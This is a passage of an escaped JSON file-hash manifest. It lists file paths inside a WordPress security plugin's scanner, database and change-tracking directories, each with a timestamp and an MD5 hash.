_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Tally\\/Handler.php\":{\"d\":1567917024,\"h\":\"d8a692c48059a35dc43a01aff9fe571b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/AdminNotes\\/EntryVO.php\":{\"d\":1567917024,\"h\":\"7b5a61bf6fb2d19667aff77c04f813f0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/AdminNotes\\/Delete.php\":{\"d\":1567917024,\"h\":\"f4cfc1c50a0007cfa23f193838179735\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/AdminNotes\\/Select.php\":{\"d\":1567917024,\"h\":\"bf9d8373599f19b65aa7949d32c9e1c4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/AdminNotes\\/Insert.php\":{\"d\":1567917024,\"h\":\"c2643bf972bda520f5334d6f884476b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/AdminNotes\\/Handler.php\":{\"d\":1567917024,\"h\":\"680eae80f5a26e3a32ba6db12699fc82\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Session\\/EntryVO.php\":{\"d\":1567917024,\"h\":\"9b5fb7568aa15949e12ab48f0caaaa30\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Session\\/Delete.php\":{\"d\":1567917024,\"h\":\"fa33337e22588aa00e2c0aa5d710a410\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Session\\/Select.php\":{\"d\":1567917024,\"h\":\"171053cb2fdb8ba4485cd8a7147996ef\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Session\\/Update.php\":{\"d\":1567917024,\"h\":\"67b80a1d67ce19f4023e5720d60eddb2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Session\\/Insert.php\":{\"d\":1567917024,\"h\":\"d7d7b6195894f44a022ded20169468b0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Session\\/Handler.php\":{\"d\":1567917024,\"h\":\"4e5b09bcda82bbefb073388e9955894d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Scanner\\/EntryVO.php\":{\"d\":1567917024,\"h\":\"f6aefe485dfb3ecb15c1519c063ce58d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Scanner\\/Delete.php\":{\"d\":1567917024,\"h\":\"fea0868527bda907e769ac7186d9c91f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Scanner\\/Select.php\":{\"d\":1567917024,\"h\":\"07b351c50b72cb677c10dc54c9d7b3f1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Scanner\\/Update.php\":{\"d\":1567917024,\"h\":\"38d5fbe7ee5608e65d2ae7e409d49cb0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Scanner\\/Insert.php\":{\"d\":1567917024,\"h\":\"8fac5d4203fde9439cfed6ac59153bcb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Scanner\\/Handler.php\":{\"d\":1567917024,\"h\":\"29063f37bbdcfde625525e5a02a9f3ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Traffic\\/EntryVO.php\":{\"d\":1567917024,\"h\":\"ff787c2b344892a88538ac6c20455ad2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Traffic\\/Delete.php\":{\"d\":1567917024,\"h\":\"b8a2ed2177b69c925ba2c7195c8fb517\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Traffic\\/Select.php\":{\"d\":1567917024,\"h\":\"1b912975b900fd6a1c107adab960b521\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Traffic\\/Insert.php\":{\"d\":1567917024,\"h\":\"0761c28c28091ee5af02a78ee18ab1af\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Traffic\\/Handler.php\":{\"d\":1567917024,\"h\":\"cc2053824458ce80ee27eb6edea876c1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Databases\\/Traffic\\/BaseTraffic.php\":{\"d\":1567917024,\"h\":\"99197d31280cc42dbb992f0b01c44412\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Controller\\/Controller.php\":{\"d\":1567917024,\"h\":\"6f9a7c0e2ce8de45235cadb9edf3bcf0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Snapshot\\/BuildMedia.php\":{\"d\":1567917024,\"h\":\"fe97b27febd2cd62a3f2362e6d2aed6d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Snapshot\\/SnapshotsConsumer.php\":{\"d\":1567917024,\"h\":\"0f7cdc3eafc66b7c9d1df3b59ba2f97d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Snapshot\\/Collate.php\":{\"d\":1567917024,\"h\":\"fbfd0606c8d028b3c9ea6478091a870c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Snapshot\\/BuildPosts.php\":{\"d\":1567917024,\"h\":\"9986ad54f6cbf5535fd1e77b261ff6c1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Snapshot\\/BuildComments.php\":{\"d\":1567917024,\"h\":\"28064290930ee7eb2b108d4a47a6272a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Snapshot\\/BuildUsers.php\":{\"d\":1567917024,\"h\":\"a4364c81be2ddf608c307ce3d1c9daea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Snapshot\\/BuildThemes.php\":{\"d\":1567917024,\"h\":\"f1868390212f8ddd27cc88184f55edee\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Snapshot\\/BuildPlugins.php\":{\"d\":1567917024,\"h\":\"1c9da1741162ef1d319711dbb7e1fe0f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Snapshot\\/BuildPages.php\":{\"d\":1567917024,\"h\":\"e335033be885858fbad541eb8f217537\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Diff\\/DiffMedia.php\":{\"d\":1567917024,\"h\":\"a8f400901f6db972a90b245719692782\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Diff\\/DiffThemes.php\":{\"d\":1567917024,\"h\":\"4290789df339f81ef8d738b76a86e56d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Diff\\/DiffComments.php\":{\"d\":1567917024,\"h\":\"e6d35cf1989f49bccd18812d0c72ed02\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Diff\\/Base.php\":{\"d\":1567917024,\"h\":\"cf6e0d5b9f8e7fca9ab11ecbefc9e486\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Diff\\/DiffPosts.php\":{\"d\":1567917024,\"h\":\"0149c53e9569092256c560825751b23f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Diff\\/DiffUsers.php\":{\"d\":1567917024,\"h\":\"462fa7cffc377363a13ce136f0f68e21\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Diff\\/DiffPages.php\":{\"d\":1567917024,\"h\":\"c0aac95cf123086e3cf1e5bd6a9da24e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Diff\\/DiffPlugins.php\":{\"d\":1567917024,\"h\":\"bef1d7e2c644c4f77a8646eef3e73646\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Report\\/Build\\/Comments.php\":{\"d\":1567917024,\"h\":\"a1aa036a7c14c641b4f69eb5868af6c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Report\\/Build\\/Posts.php\":{\"d\":1567917024,\"h\":\"3f68e43de492e98fed35f3f26775d1bb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Report\\/Build\\/Themes.php\":{\"d\":1567917024,\"h\":\"e4f8b90255764dd4d6d66ec86d5beec9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Report\\/Build\\/Base.php\":{\"d\":1567917024,\"h\":\"67bb1fe6c91acaa4c7c3630d4406c0ae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Report\\/Build\\/Pages.php\":{\"d\":1567917024,\"h\":\"9f9d11f3259838002d19ee724741db19\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Report\\/Build\\/Plugins.php\":{\"d\":1567917024,\"h\":\"567b756e840b632c79ca8f59929f2150\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Report\\/Build\\/Media.php\":{\"d\":1567917024,\"h\":\"b6fc18cba5efde3cd3ff6a77e1877c2e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/ChangeTrack\\/Report\\/Build\\/Users.php\":{\"d\":1567917024,\"h\":\"e7fccd7779f2a21409b45fedf0c2185a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ufc\\/ScanActionVO.php\":{\"d\":1567917024,\"h\":\"af335e73caa1a588fce9779ce8aa609e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ufc\\/BuildFileMap.php\":{\"d\":1567917024,\"h\":\"8909738195cac170640babad0ab90555\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ufc\\/ScanFromFileMap.php\":{\"d\":1567917024,\"h\":\"dcfbc9aa1d2b0a25c34134fccc1508b3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ufc\\/ConvertResultsToVos.php\":{\"d\":1567917024,\"h\":\"eeeac441dabaade9dc6aeed50d9cf366\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ufc\\/Repair.php\":{\"d\":1567917024,\"h\":\"2c69139a22779b42a190d0cbb38740d4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ufc\\/ResultsSet.php\":{\"d\":1567917024,\"h\":\"0bcce64100dc1e2ba3610d53dac57b9b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ufc\\/ConvertVosToResults.php\":{\"d\":1567917024,\"h\":\"d46551f78418c72cae6f42724f467290\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ufc\\/BuildScanAction.php\":{\"d\":1567917024,\"h\":\"9a5fc8a86235ac951037d943a7ecf1a2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ufc\\/ResultItem.php\":{\"d\":1567917024,\"h\":\"9ff051809f33c32dced40d6d2cb50a8c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ufc\\/Scan.php\":{\"d\":1567917024,\"h\":\"507c5b6a87d1c9a8bec3c5c3ce71e795\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Ufc\\/FileScanner.php\":{\"d\":1567917024,\"h\":\"4b9d1140ed2e03ab1b07650cee5ecf19\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Mal\\/ScanActionVO.php\":{\"d\":1567917024,\"h\":\"5a739b113e712bb8520fc92d43036eb1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Mal\\/BuildFileMap.php\":{\"d\":1567917024,\"h\":\"13ecbc22c2209ae4868f9fdabfef4bcf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Mal\\/ScanFromFileMap.php\":{\"d\":1567917024,\"h\":\"3d923257dc1ad1cd8cdfbce15098e0e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Mal\\/ConvertResultsToVos.php\":{\"d\":1567917024,\"h\":\"d99bb4975ce4f825e060880869a8f97b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Mal\\/Repair.php\":{\"d\":1567917024,\"h\":\"37a36a86e13dd00da1b43cd8556ba508\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Mal\\/ResultsSet.php\":{\"d\":1567917024,\"h\":\"f4037d2ad826364688a142a188d6fdcd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Mal\\/ConvertVosToResults.php\":{\"d\":1567917024,\"h\":\"472f9271667a0b131d0f316b848d521e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Mal\\/BuildScanAction.php\":{\"d\":1567917024,\"h\":\"104de8c3815c580e01a45e56dd2fed89\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Mal\\/ResultItem.php\":{\"d\":1567917024,\"h\":\"527d274545bb11cfcb42cb0b1772f512\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Mal\\/Scan.php\":{\"d\":1567917024,\"h\":\"682df9e81bf3448a41ba96978415eae9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Mal\\/FileScanner.php\":{\"d\":1567917024,\"h\":\"7ac8ca7521de5bb193487973fd7f8a0a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Helpers\\/StandardDirectoryIterator.php\":{\"d\":1567917024,\"h\":\"5c955fae299c1a09df4461f8ae2c669e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Helpers\\/CopyResultsSets.php\":{\"d\":1567917024,\"h\":\"f0dfacabe74f1ff2a70e563f45944913\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Helpers\\/BuildHashesFromDir.php\":{\"d\":1567917024,\"h\":\"b0dba2fa4ec056ce99d036fe0c2ea0e1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Helpers\\/WpCoreFile.php\":{\"d\":1567917024,\"h\":\"464078e67e3a21821e17f6f7eb0a1a1b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Helpers\\/BuildHashesFromApi.php\":{\"d\":1567917024,\"h\":\"33aa2096d36feaef591af3176bc3e916\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Helpers\\/MergeResultsSets.php\":{\"d\":1567917024,\"h\":\"bb572cf38f27bfc259e38adcda6074f6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Helpers\\/ScannerRecursiveFilterIterator.php\":{\"d\":1567917024,\"h\":\"d34ad4ef0842a936fdbfacac09626cbc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wcf\\/ScanActionVO.php\":{\"d\":1567917024,\"h\":\"3a3b15333e8c0861e428384a979bd1bc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wcf\\/BuildFileMap.php\":{\"d\":1567917024,\"h\":\"7c366613875adfe169290e1504eddaec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wcf\\/ScanFromFileMap.php\":{\"d\":1567917024,\"h\":\"ecbcea81ab890aece1e8d37ca068abf3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wcf\\/ConvertResultsToVos.php\":{\"d\":1567917024,\"h\":\"e71720420bdb09578515285ac156472e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wcf\\/Repair.php\":{\"d\":1567917024,\"h\":\"aa4ce0e35fe7a169033908af4f8ddf7e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wcf\\/ResultsSet.php\":{\"d\":1567917024,\"h\":\"1fe9ac2c26c85603c563c6ea192e72fc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wcf\\/ConvertVosToResults.php\":{\"d\":1567917024,\"h\":\"4c7e227ee5cac31faad54c28f507d754\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wcf\\/BuildScanAction.php\":{\"d\":1567917024,\"h\":\"ca2d1426cbbfeeffc0e9a4d07a25b9db\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wcf\\/ResultItem.php\":{\"d\":1567917024,\"h\":\"b71027e93a571326b07e5e725ded445c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wcf\\/Scan.php\":{\"d\":1567917024,\"h\":\"1ea95fe9287295fef89474168044c8ad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Wcf\\/FileScanner.php\":{\"d\":1567917024,\"h\":\"daa434cafa443789bb16c02471f819ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/Files\\/BaseFileMapScan.php\":{\"d\":1567917024,\"h\":\"47a080066c3668c51628c87733f11e83\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/Files\\/BaseFileScanner.php\":{\"d\":1567917024,\"h\":\"b1f4f1531dc2d9a2690f718935d294cc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/Files\\/BaseScanFromFileMap.php\":{\"d\":1567917024,\"h\":\"f03b7d0c438cce02ec1e648632d75e04\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/ScanResults\\/Clean.php\":{\"d\":1567917024,\"h\":\"85593cc9bfae0e89574a1c1f01571a14\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/BaseBuildScanAction.php\":{\"d\":1567917024,\"h\":\"a6df0f52bd27a745cd7376fae2149bbf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/ActionStore.php\":{\"d\":1567917024,\"h\":\"e02125befb253e5ef3e2ab4810083270\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/BaseScanActionVO.php\":{\"d\":1567917024,\"h\":\"78aff98d1dfb213e18f1e157d0754bcd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/BaseConvertResultsToVos.php\":{\"d\":1567917024,\"h\":\"6cd656dc9fcec8532adbce30a9d193eb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/BaseResultsSet.php\":{\"d\":1567917024,\"h\":\"c219b8bff684e7445733476fd79a3725\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/BaseMergeItems.php\":{\"d\":1567917024,\"h\":\"0495b14b579be9e7e347e5e7c9beb58f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/BaseScan.php\":{\"d\":1567917024,\"h\":\"68e1f40af0da63af33bfc37a62a0a220\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/DiffResultForStorage.php\":{\"d\":1567917024,\"h\":\"002231fc2add54cab859dadb62e87d1d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/BaseConvertVosToResults.php\":{\"d\":1567917024,\"h\":\"66b1bfad0a8b98e4ebbed6975879ddef\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/BaseRepair.php\":{\"d\":1567917024,\"h\":\"688be0c69f6ce48f1d0efc77bda90dc1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/ScannerProfileConsumer.php\":{\"d\":1567917024,\"h\":\"8cf376891da41a9912be9700ab5525cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/BaseResultItem.php\":{\"d\":1567917024,\"h\":\"cbece29d68851a0f20bc82c5e296e757\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/ScannerProfile.php\":{\"d\":1567917024,\"h\":\"a1c76023b066e22f5525a22efe842f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Base\\/ScanActionQuery.php\":{\"d\":1567917024,\"h\":\"ca28119fc5f9a90d9be5063c36585908\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Apc\\/ScanActionVO.php\":{\"d\":1567917024,\"h\":\"b8cf473b1541fa2168e2299baf1545e4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Apc\\/PluginScanner.php\":{\"d\":1567917024,\"h\":\"760c4da737efab0403c1c400c7e0c095\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Apc\\/ConvertResultsToVos.php\":{\"d\":1567917024,\"h\":\"a3f4a0dd9b271f25edee20cd37a0b340\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Apc\\/ResultsSet.php\":{\"d\":1567917024,\"h\":\"cbf14cecd04cc6e8898044e6054af5df\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Apc\\/ConvertVosToResults.php\":{\"d\":1567917024,\"h\":\"eb4584a89059495189d0ed021c4976e7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Apc\\/BuildScanAction.php\":{\"d\":1567917024,\"h\":\"68306bd69c8cb2c4989d8701e8ad30e4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Apc\\/ResultItem.php\":{\"d\":1567917024,\"h\":\"b64e1259ee389f4cd8e5f886ca8d67c3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Apc\\/Scan.php\":{\"d\":1567917024,\"h\":\"504add1bea7ec7a32a555d9135cb5c05\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/src\\/Scans\\/Realtime\\/Files\\/B